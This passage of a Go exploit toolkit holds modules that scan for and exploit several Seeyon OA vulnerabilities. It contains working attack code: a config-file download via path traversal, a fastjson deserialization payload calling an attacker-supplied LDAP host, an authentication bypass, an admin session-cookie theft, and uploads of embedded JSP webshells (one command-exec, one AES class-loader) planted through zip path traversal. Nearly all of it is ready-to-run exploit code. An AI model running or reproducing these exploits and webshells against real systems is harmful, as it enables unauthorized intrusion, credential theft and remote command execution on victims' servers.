err != nil { 15 | color.Red("[x]请求异常！") 16 | return 17 | } 18 | if vulnerable { 19 | color.Green("[+]存在webmail.do任意文件下载（CNVD-2020-62422）") 20 | } else { 21 | color.White("[-]不存在webmail.do任意文件下载（CNVD-2020-62422）") 22 | } 23 | } 24 | 25 | func sy03scancore(targetUrl string) (bool, error) { 26 | scancorePayload := "/seeyon/webmail.do?method=doDownloadAtt&filename=datasourceCtp.txt&filePath=../conf/datasourceCtp.properties" 27 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 28 | if err != nil { 29 | return false, err 30 | } 31 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 32 | resp, err := (&http.Client{}).Do(req) 33 | if err != nil { 34 | return false, err 35 | } 36 | defer resp.Body.Close() 37 | 38 | if resp.StatusCode == 200 { 39 | return true, nil 40 | } else { 41 | return false, err 42 | } 43 | } 44 | 45 | func (*Sy03) Exploit(targetUrl string) { 46 | runResult, err := sy03runcore(targetUrl) 47 | if err != nil { 48 | color.Red("[x]漏洞利用异常！") 49 | return 50 | } 51 | if runResult != "" { 52 | color.White(runResult) 53 | } else { 54 | color.White("[!]漏洞利用无返回结果") 55 | } 56 | } 57 | 58 | func sy03runcore(targetUrl string) (string, error) { 59 | runcorePayload := "/seeyon/webmail.do?method=doDownloadAtt&filename=datasourceCtp.txt&filePath=../conf/datasourceCtp.properties" 60 | req, err := http.NewRequest("GET", targetUrl+runcorePayload, nil) 61 | if err != nil { 62 | return "", err 63 | } 64 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 65 | resp, err := (&http.Client{}).Do(req) 66 | if err != nil { 67 | return "", err 68 | } 69 | defer resp.Body.Close() 70 | respContent, err := ioutil.ReadAll(resp.Body) 71 | if err != nil { 72 | return "", err 73 | } 74 | return string(respContent), nil 75 | } 76 | -------------------------------------------------------------------------------- /vulners/sy01.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy01 struct { 11 | } 12 | 13 | func (s *Sy01) Scan(targetUrl string) { 14 | vulnerable, err := sy01scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常！") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在seeyon<8.0_fastjson反序列化") 21 | } else { 22 | color.White("[-]不存在seeyon<8.0_fastjson反序列化") 23 | } 24 | } 25 | 26 | func (*Sy01) Exploit(targetUrl string) { 27 | s := strings.Split(targetUrl, "|") 28 | ldapUrl := s[1] 29 | command := s[2] 30 | runResult, err := sy01runcore(targetUrl, ldapUrl, command) 31 | if err != nil { 32 | color.Red("[x]漏洞利用异常！") 33 | return 34 | } 35 | if runResult != "" { 36 | color.White(runResult) 37 | } else { 38 | color.White("[!]漏洞利用无返回结果") 39 | } 40 | } 41 | 42 | func sy01scancore(targetUrl string) (bool, error) { 43 | fastjson_payload := "_json_params={\"name\":\"S\",\"age\":21" 44 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/main.do?method=changeLocale", strings.NewReader(fastjson_payload)) 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | if err != nil { 47 | return false, err 48 | } 49 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 50 | resp, err := (&http.Client{}).Do(req) 51 | if err != nil { 52 | return false, err 53 | } 54 | defer resp.Body.Close() 55 | resContent, err := ioutil.ReadAll(resp.Body) 56 | if err != nil { 57 | return false, err 58 | } 59 | if (strings.Contains(string(resContent), "errorHandle")) && (strings.Contains(string(resContent), "syntax")) { 60 | return true, nil 61 | } else { 62 | return false, nil 63 | } 64 | } 65 | 66 | func sy01runcore(targetUrl string, ldapUril string, command string) (string, error) { 67 | runcorePayload := "_json_params={\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"" + ldapUril + "\",\"autoCommit\":true}" 68 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/main.do?method=changeLocale", strings.NewReader(runcorePayload)) 69 | if err != nil { 70 | return "", err 71 | } 72 | req.Header.Set("cmd", command) 73 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 74 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 75 | resp, err := (&http.Client{}).Do(req) 76 | if err != nil { 77 | return "", err 78 | } 79 | defer resp.Body.Close() 80 | respContent, _ := ioutil.ReadAll(resp.Body) 81 | if strings.Contains(string(respContent), "parent.errorHandle") { 82 | return "", nil 83 | } else { 84 | return string(respContent), nil 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /vulners/sy06.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy06 struct { 11 | } 12 | 13 | func (s *Sy06) Scan(targetUrl string) { 14 | vulnerable, err := sy06scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常！") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在htmlofficeservlet任意文件上传") 21 | } else { 22 | color.White("[-]不存在htmlofficeservlet任意文件上传") 23 | } 24 | } 25 | 26 | func (*Sy06) Exploit(targetUrl string) { 27 | runResult, err := sy06runcore(targetUrl) 28 | if err != nil { 29 | color.Red("[x]漏洞利用异常！") 30 | return 31 | } 32 | if runResult != "" { 33 | color.White(runResult) 34 | } else { 35 | color.White("[!]漏洞利用失败！") 36 | } 37 | } 38 | 39 | func sy06scancore(targetUrl string) (bool, error) { 40 | scancorePayload := "/seeyon/htmlofficeservlet" 41 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 42 | if err != nil { 43 | return false, err 44 | } 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | resp, err := (&http.Client{}).Do(req) 47 | if err != nil { 48 | return false, err 49 | } 50 | defer resp.Body.Close() 51 | respContent, err := ioutil.ReadAll(resp.Body) 52 | if err != nil { 53 | return false, err 54 | } 55 | if resp.StatusCode == 200 && strings.Contains(string(respContent), "htmoffice") { 56 | return true, nil 57 | } else { 58 | return false, nil 59 | } 60 | } 61 | 62 | func sy06runcore(targetUrl string) (string, error) { 63 | runcorePayload := ` 64 | DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV 65 | OPTION=S3WYOSWLBSGr 66 | currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 67 | CREATEDATE=wUghPB3szB3Xwg66 68 | RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 69 | originalFileId=wV66 70 | originalCreateDate=wUghPB3szB3Xwg66 71 | FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 72 | needReadFile=yRWZdAS6 73 | originalCreateDate=wLSGP4oEzLKAz4=iz=66 74 | <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("seeyoner".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("

"+excuteCmd(request.getParameter("cmd")) + "

");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce 75 | ` 76 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/htmlofficeservlet", strings.NewReader(runcorePayload)) 77 | if err != nil { 78 | return "", err 79 | } 80 | resp, err := (&http.Client{}).Do(req) 81 | if err != nil { 82 | return "", err 83 | } 84 | defer resp.Body.Close() 85 | if checkShell(targetUrl) { 86 | return "文件上传成功！" + targetUrl + "/seeyon/test123456.jsp?pass=seeyoner&cmd=whoami", nil 87 | } else { 88 | return "", nil 89 | } 90 | } 91 | func checkShell(targetUrl string) (result bool) { 92 | shellpath := targetUrl + "/seeyon/test123456.jsp" 93 | req, err := http.NewRequest("GET", shellpath, nil) 94 | if err != nil { 95 | color.Red("[x]Webshell访问异常！") 96 | return 97 | } 98 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 99 | resp, _ := (&http.Client{}).Do(req) 100 | defer resp.Body.Close() 101 | if resp.StatusCode == 200 { 102 | return true 103 | } else { 104 | return false 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /vulners/sy04.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "github.com/fatih/color" 5 | "io/ioutil" 6 | "net/http" 7 | "strings" 8 | ) 9 | 10 | type Sy04 struct { 11 | } 12 | 13 | func (s *Sy04) Scan(targetUrl string) { 14 | vulnerable, err := sy04scancore(targetUrl) 15 | if err != nil { 16 | color.Red("[x]请求异常！") 17 | return 18 | } 19 | if vulnerable { 20 | color.Green("[+]存在ajax.do未授权&任意文件上传") 21 | } else { 22 | color.White("[-]不存在ajax.do未授权&任意文件上传") 23 | } 24 | } 25 | 26 | func (*Sy04) Exploit(targetUrl string) { 27 | runResult, err := sy04runcore(targetUrl) 28 | if err != nil { 29 | color.Red("[x]漏洞利用异常！") 30 | return 31 | } 32 | if runResult != "" { 33 | color.White(runResult) 34 | } else { 35 | color.White("[!]漏洞利用无返回结果.") 36 | } 37 | } 38 | 39 | func sy04scancore(targetUrl string) (bool, error) { 40 | scancorePayload := "/seeyon/thirdpartyController.do.css/..;/ajax.do" 41 | req, err := http.NewRequest("GET", targetUrl+scancorePayload, nil) 42 | if err != nil { 43 | return false, err 44 | } 45 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 46 | resp, err := (&http.Client{}).Do(req) 47 | if err != nil { 48 | return false, err 49 | } 50 | defer resp.Body.Close() 51 | 52 | if resp.StatusCode == 404 { 53 | return false, nil 54 | } else { 55 | return true, nil 56 | } 57 | } 58 | 59 | func sy04runcore(targetUrl string) (string, error) { 60 | runcorePayload := "managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%0AuTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%22%C3%8A%C3%98%C3%AE%C3%84%1EZ%5B%11QTP%5E%1B%7B%C2%80%2A%C2%84%C3%82%2A%60%C3%A5%21e%C3%87%C3%BC%C3%B7-%C3%84%C2%9E%C3%AE%C2%89%C3%AD%C2%ADKfee%7E%C2%95%C3%AF%C2%BF%5E%C3%9B%C3%87%C3%A4L%0A%C3%AC%C3%AEi%C3%AA%C2%B7%C3%BF%C3%A0%C3%BA_%C2%B87%C2%89%C3%AA%C2%92Z%C3%92%C3%8E%C3%BD%2Co%C2%BF%C2%8BgUz%C3%B6%C2%B3%0C%25q%C3%BD%C2%A8%C3%A7g%14%07%5C%C3%AA%C3%A6%21%C3%B7%27%C3%97%C3%AAv%7B%17%C3%9Fs%C3%934%C3%ABe%C2%BEO%C2%93%C2%B8%07%12B%18%C2%81%7E%C2%86%C2%82%C3%98%3F%C3%B7R7%C3%B0W.M%C2%8A%C2%BC%C3%97%C3%BA%C3%BE%3B%C3%97%C2%9C%C3%9F%22%C2%B7t%C2%BB%28%C3%A9n%19Zn%C2%9EQ%C3%AE%C2%9F%C2%B9%C3%B4%C2%9D%17%18v%C3%AC_%C2%B8O%C3%94%3A%C3%B5%C3%97%C2%8F-r%C2%8E%C2%BBQ%C2%96V%C2%AD%C2%87%C2%9F%C2%A0%C3%9C%C3%9D%C2%B7%2C%C3%B41%C2%AE%C2%9D%C3%9BJ%C3%A9%15%C2%BC%C2%A4%C3%94%13%C3%86%C2%BC%C2%BC%08sO%12%C2%AF%1BR%C3%8Bx%C3%A4.4%1E%C2%BC%24%C3%A5JHCHf%05%18%18%C3%85%C2%8A%C2%A8%C2%A5%C2%A7%C2%8F%C2%95C%C3%BF%C2%B9%3CH%C3%B3%C3%98%C3%91%C3%A5%00%12%C2%83%02%01%C2%97%5E%C3%84%C2%A3%C2%B5%3E%C2%A4r4%7Crc%C3%B5%C2%B2%21Z%0A%C2%88%11A%09%0B%C2%8E.%5El%13bY%C3%829%C2%90%C3%86%14%C3%96%C3%B8d.%C3%98%C2%BA%C3%98g%C3%AF%C3%99%0A%25%C3%99%C3%ADn%05%C2%85%3DX%C2%8A%60%C2%A1%C2%95%C2%9F%C3%8A%18%C2%AEc%C2%AE%0B%05%C3%89%C3%A56%C2%AA%C3%BE%01%C2%83%C3%A7o%C2%8EdD%C2%9E4%C2%A7%C2%B6%C2%A5%C2%A5%C2%9E0%7C%C2%94%255%C2%B3-%C3%B5%2A%C3%8F%0F%C2%81c%C2%85%C2%BCc%C2%8A%27%40%27%2FL%C3%A7%0A%C3%B8%C2%AA%C2%B4M%0D%C2%8387%C2%94Y%C2%A3%C2%B7%C2%97%C3%86%21%C3%83%C2%A0%C2%B2%C2%B4N%C3%BD%C2%81%C3%9A%07%C2%8CW%18%C2%BF%19%C3%B4%2F%C3%90%5Cf%C2%AE%C2%B9%0EvB%15%C2%82%C3%81%3Aph%C2%88%7CK%C3%83%C3%B2%3C%C2%876%C3%82%23%16%1F%0F%C2%ADe%21%2F%1A%C2%BB%15%C3%91%C2%B0Cp%C3%A1%1C%1AlE%C2%92%C2%B3%C3%B5%C2%B4B%2BRa%C2%8F%40%C3%9E%C2%9D%C2%9EFG%C2%8B%7Fb9%C2%AD%C3%B3%7Er%C3%8CZo%19%C2%B2%1C%C2%B0%C3%BC%C3%9D%C3%B3%16%C2%AB%11+%C3%B8%02%C2%A5%0A%C3%83%17q%0F%17%C3%8B%C3%94%23+p%C2%AF%3Cr%C3%B6%C2%BB%C2%BE%C2%B3_%C3%93%C2%8D%C3%A9%60%3B2N%C2%9B%C2%BD%C3%9C%C2%B7%C2%91%3C%02%C2%82q%C2%BD%C3%95%00%C2%89%17hi%C2%A6mV%7DG%0F%10%C3%94%C3%A5%C3%8C%C2%A5%C2%A7%C3%91N%C3%80%17%C2%B7%C2%89q%C3%BC%C3%86%C2%AF%08%C3%84p%C2%86Y%5D%C2%B5%C3%90%23%2AV%C2%A6%C3%8B%C2%89f%C2%AC%C2%91%C2%B2%C3%8F%C2%A3%15%C2%8B%C3%81%C2%B5v%C3%89%1AU%C2%85c%C2%81%C3%A0+%18Q%1D%C2%AB.%18%C3%A2a0%C3%816%0D%C2%92%0F%7F%C3%86%C3%8E%C2%AF%7F%C2%A6%0A%C2%95%C2%91%C2%A2%C3%9F%C3%A4%C3%93%3A_%C2%80%06%C3%A9%C3%AA%0D_%3F%C2%8D%3Cb%0CX%7D%12%28%C2%85%29%C2%A07%C2%BD%C2%A6%3E%C2%B5%C3%9E%C3%8D%C2%AF_k%C2%A3LOL%0E%12%C2%9B%C2%8A%27%C2%8FwX%3E%C3%A6%C2%99%22%C2%89%18%C3%92%C3%89%15%C2%9A%C3%83%C3%823%C3%B1%C2%95%C2%BDMw%C2%86%3AW%23m%C3%86%C3%B2Z%C3%9E%C3%AD%C2%8A%5B%7F%08%1A%C3%9E%C3%85%06qX%C2%AF%2A%C2%8B%25%06%C2%96%C2%81%C3%81%60W8%C2%82%C3%81%1F%C2%88%C3%B1%C3%B6G%01j%C2%9E%C2%8D%C2%B3G%0E%09%C3%B33e1%C2%B0%C3%B8%C3%A1%C3%92%C2%8BU%C3%9E6%C3%85%C2%88%C3%85%C3%87%C3%BC0%2Ah%C3%8E3%40%C3%83%5BO%C3%AF%C2%84q%01%25c%08Ym%C2%B7%C3%93%C3%B1%C2%AD%27%C2%81%C2%A0R%C3%97%C2%9A%C3%B0%C2%9Ed%C3%B0%C3%9B%C3%A8R6u%5D%C2%96%C3%9E%60%C3%B7%C3%B8%3E%C3%A3%5CV%C3%84%5D%C2%822%C3%90%C2%9D%3C%C3%AB%C2%B3o%C3%83%17%1F%24%C2%90%C2%8D9%C2%BC%C3%93f%C3%82%3FW%C3%AA%C3%BCw%C2%AA%1B%C2%B3%C3%BB%C2%A5%C2%B1m.%C2%9D%3B%60%C2%B7%C2%A1%C2%93%C3%A2xd%00%C2%B7%25%C3%B0%C3%B0%C2%A5u%C3%98%C3%8F%C2%BF%3E%7D%5C%12%1F%C2%B7L%C3%B7v%C3%81q%C3%A7%23%C3%B8%C3%BF%C3%A9%02%C2%9Cd%3Es%C3%AC%C3%87%C3%B7zA2%06%C3%BAG.%C3%8B%C3%9D%1C%01%C2%AE%C2%AA%C2%AA%C3%8E%C3%83k%C3%BB%07%C3%9B%C2%9Als%C2%BE%C3%964%3F%17%7E%C3%BB%C3%AF%7F%01-%C2%A9%C2%AB%26p%05%00%00" 61 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip", strings.NewReader(runcorePayload)) 62 | if err != nil { 63 | return "", err 64 | } 65 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 66 | resp, err := (&http.Client{}).Do(req) 67 | if err != nil { 68 | return "", err 69 | } 70 | defer resp.Body.Close() 71 | resContent, err := ioutil.ReadAll(resp.Body) 72 | if err != nil { 73 | return "", err 74 | } 75 | if strings.Contains(string(resContent), "\"message\":null") { 76 | return targetUrl + "/seeyon/common/designer/pageLayout/mrn.jsp，密码rebeyond", nil 77 | } else { 78 | return "", nil 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /vulners/sy02.go: -------------------------------------------------------------------------------- 1 | package vulners 2 | 3 | import ( 4 | "archive/zip" 5 | "bytes" 6 | "fmt" 7 | "github.com/fatih/color" 8 | "io/ioutil" 9 | "math/rand" 10 | "mime/multipart" 11 | "net/http" 12 | "os" 13 | "regexp" 14 | "strings" 15 | "time" 16 | ) 17 | 18 | var ( 19 | WebshellName string 20 | ) 21 | 22 | type Sy02 struct { 23 | } 24 | 25 | func (s *Sy02) Scan(targetUrl string) { 26 | vulnerable, err := sy02scancore(targetUrl) 27 | if err != nil { 28 | color.Red("[x]请求异常！") 29 | return 30 | } 31 | if vulnerable { 32 | color.Green("[+]存在thirdpartyController.do管理员session泄露") 33 | } else { 34 | color.White("[-]不存在thirdpartyController.do管理员session泄露") 35 | } 36 | } 37 | 38 | func sy02scancore(targetUrl string) (bool, error) { 39 | sessionLeakPayload := "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 40 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/thirdpartyController.do", strings.NewReader(sessionLeakPayload)) 41 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 42 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 43 | resp, err := (&http.Client{}).Do(req) 44 | if err != nil { 45 | return false, err 46 | } 47 | defer resp.Body.Close() 48 | resContent, err := ioutil.ReadAll(resp.Body) 49 | if err != nil { 50 | return false, err 51 | } 52 | if resp.Header.Get("Set-Cookie") != "" && (strings.Contains(string(resContent), "a8genius.do")) { 53 | return true, nil 54 | } else { 55 | return false, nil 56 | } 57 | } 58 | 59 | func getCookie(targetUrl string) (cookiestr string) { 60 | adminCookie := "" 61 | sessionLeakPayload := "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 62 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/thirdpartyController.do", strings.NewReader(sessionLeakPayload)) 63 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 64 | if err != nil { 65 | color.Red("[x]探测失败！（req）") 66 | } 67 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 68 | resp, err := (&http.Client{}).Do(req) 69 | if err != nil { 70 | color.Red("[x]探测失败！（req）") 71 | } 72 | defer resp.Body.Close() 73 | resContent, err := ioutil.ReadAll(resp.Body) 74 | if err != nil { 75 | color.Red("[x]探测失败！（resp）") 76 | } 77 | isExist := (resp.Header.Get("Set-Cookie") != "") && (strings.Contains(string(resContent), "a8genius.do")) 78 | if isExist { 79 | adminCookie = resp.Header.Get("Set-Cookie")[:44] 80 | color.Green("[+]Cookie获取成功：" + adminCookie) 81 | } else { 82 | color.White("[-]获取Cookie失败！") 83 | adminCookie = "" 84 | } 85 | return adminCookie 86 | } 87 | 88 | func createZip() (string, error) { 89 | shellData := "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"seeyoner\")!=null){String k=(\"\"+UUID.randomUUID()).replace(\"-\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>" 90 | WebshellName = RandStringRunes(10) + ".jsp" 91 | buf := new(bytes.Buffer) 92 | w := zip.NewWriter(buf) 93 | var files = []struct { 94 | Name, Body string 95 | }{ 96 | {"layout.xml", ""}, 97 | {"../" + WebshellName, shellData}, 98 | } 99 | for _, file := range files { 100 | f, err := w.Create(file.Name) 101 | if err != nil { 102 | return "", err 103 | } 104 | _, err = f.Write([]byte(file.Body)) 105 | if err != nil { 106 | return "", err 107 | } 108 | } 109 | // 关闭压缩文档 110 | err := w.Close() 111 | if err != nil { 112 | return "", err 113 | } 114 | // 将压缩文档内容写入文件 115 | zipFileName := RandStringRunes(5) + ".zip" 116 | f, err := os.OpenFile(zipFileName, os.O_CREATE|os.O_WRONLY, 0666) 117 | if err != nil { 118 | return "", err 119 | } 120 | buf.WriteTo(f) 121 | return zipFileName, nil 122 | } 123 | 124 | func uploadZipFile(uri string, params map[string]string, paramName, path string, cookie string) (*http.Request, error) { 125 | file, err := os.Open(path) 126 | if err != nil { 127 | return nil, err 128 | } 129 | fileContents, err := ioutil.ReadAll(file) 130 | if err != nil { 131 | return nil, err 132 | } 133 | fi, err := file.Stat() 134 | if err != nil { 135 | return nil, err 136 | } 137 | file.Close() 138 | 139 | body := new(bytes.Buffer) 140 | writer := multipart.NewWriter(body) 141 | part, err := writer.CreateFormFile(paramName, fi.Name()) 142 | if err != nil { 143 | return nil, err 144 | } 145 | part.Write(fileContents) 146 | 147 | for key, val := range params { 148 | _ = writer.WriteField(key, val) 149 | } 150 | err = writer.Close() 151 | if err != nil { 152 | return nil, err 153 | } 154 | request, err := http.NewRequest("POST", uri, body) 155 | request.Header.Add("Content-Type", writer.FormDataContentType()) 156 | request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 157 | request.Header.Add("Cookie", cookie) 158 | return request, err 159 | } 160 | 161 | func unzipShell(targetUrl string, adminCookie string, respContent string) { 162 | oYear := time.Now().Year() 163 | oMonth := time.Now().Format("01") 164 | oDay := time.Now().Format("02") 165 | dateArgs := fmt.Sprintf("%d-%s-%s", oYear, oMonth, oDay) 166 | re := regexp.MustCompile(`(?i)fileurls=fileurls\+","\+\'(.+)\'`) 167 | shellfileid := re.FindStringSubmatch(respContent)[1] 168 | color.White("[!]上传文件id：" + re.FindStringSubmatch(respContent)[1]) 169 | unzipshellPayload := "method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,\"" + dateArgs + "\",\"" + shellfileid + "\"]" 170 | req, err := http.NewRequest("POST", targetUrl+"/seeyon/ajax.do", strings.NewReader(unzipshellPayload)) 171 | if nil != err { 172 | color.Red("[x]ajax.do接口请求失败！") 173 | return 174 | } 175 | req.Header.Set("Content-Type", "application/x-www-form-urlencoded") 176 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36") 177 | req.Header.Set("Cookie", adminCookie) 178 | resp, err := (&http.Client{}).Do(req) 179 | if err != nil { 180 | color.Red("[x]ajax.do接口请求失败！") 181 | return 182 | } 183 | defer resp.Body.Close() 184 | if err != nil { 185 | color.Red("[x]ajax.do接口返回异常！") 186 | return 187 | } 188 | if resp.StatusCode == 500 { 189 | color.Green("[+]zip文件解压成功！") 190 | color.White("[*]Webshell连接地址：" + targetUrl + "/seeyon/common/designer/pageLayout/" + WebshellName) 191 | color.White("[*]探测Webshell存活状态...") 192 | r, err := http.Get(targetUrl + "/seeyon/common/designer/pageLayout/" + WebshellName) 193 | if err != nil { 194 | color.Red("[x]Webshell访问异常！") 195 | return 196 | } 197 | defer r.Body.Close() 198 | if r.StatusCode == 200 { 199 | color.Green("[+]Webshell连接成功！") 200 | } else { 201 | color.Red("[x]Webshell连接失败！") 202 | } 203 | } 204 | } 205 | 206 | func (*Sy02) Exploit(targetUrl string) { 207 | adminCookie := getCookie(targetUrl) 208 | zipFileName, err := createZip() 209 | if err != nil { 210 | color.Red("[x]zip文件创建失败！") 211 | return 212 | } 213 | zipFilePath := "./" + zipFileName 214 | color.Green("[+]zip文件创建成功，路径：" + zipFilePath) 215 | vulnPath := targetUrl + "/seeyon/fileUpload.do?method=processUpload" 216 | extraParams := map[string]string{ 217 | "firstSave": "true", 218 | "callMethod": "resizeLayout", 219 | "isEncrypt": "0", 220 | "takeOver": "false", 221 | "type": "0", 222 | } 223 | request, err := uploadZipFile(vulnPath, extraParams, "file", zipFilePath, adminCookie) 224 | if err != nil { 225 | color.Red("[x]上传zip文件失败！") 226 | return 227 | } 228 | //fmt.Println(request.Body) 229 | client := &http.Client{} 230 | resp, err := client.Do(request) 231 | if err != nil { 232 | color.Red("[x]上传zip文件失败！") 233 | return 234 | } 235 | defer resp.Body.Close() 236 | respContent, err := ioutil.ReadAll(resp.Body) 237 | if err != nil { 238 | color.Red("[x]读取返回时异常！") 239 | return 240 | } 241 | if strings.Contains(string(respContent), "fileurls") { 242 | color.Green("[+]zip文件上传成功！") 243 | unzipShell(targetUrl, adminCookie, string(respContent)) 244 | } 245 | } 246 | 247 | func RandStringRunes(n int) string { 248 | rand.Seed(time.Now().UnixNano()) 249 | var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") 250 | b := make([]rune, n) 251 | for i := range b { 252 | b[i] = letterRunes[rand.Intn(len(letterRunes))] 253 | } 254 | return string(b) 255 | } 256 | --------------------------------------------------------------------------------